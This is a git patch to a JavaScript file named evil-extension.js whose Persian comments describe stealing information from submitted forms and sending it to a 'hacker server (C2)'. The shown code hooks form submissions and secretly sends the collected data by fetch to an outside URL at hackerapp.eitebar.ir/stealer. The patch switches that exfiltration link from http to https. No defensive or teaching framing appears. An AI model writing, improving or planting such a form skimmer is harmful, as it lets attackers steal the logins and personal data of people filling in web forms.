From 40a879447c30b806b5f03c65b7fc6c25ec630516 Mon Sep 17 00:00:00 2001 From: mcoder Date: Wed, 15 Apr 2026 14:54:54 +0330 Subject: [PATCH] Add --- public/evil-extension.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/public/evil-extension.js b/public/evil-extension.js index 1af2166..240412f 100644 --- a/public/evil-extension.js +++ b/public/evil-extension.js @@ -15,7 +15,7 @@ document.addEventListener('submit', function(e) { console.log("🕵️ در حال سرقت اطلاعات: ", stolenData); // آدرس سرور هکر (C2) - let hackerUrl = 'http://hackerapp.eitebar.ir/stealer?data=' + encodeURIComponent(JSON.stringify(stolenData)); + let hackerUrl = 'https://hackerapp.eitebar.ir/stealer?data=' + encodeURIComponent(JSON.stringify(stolenData)); // ارسال مخفیانه اطلاعات بدون متوقف کردن روند عادی فرم fetch(hackerUrl, {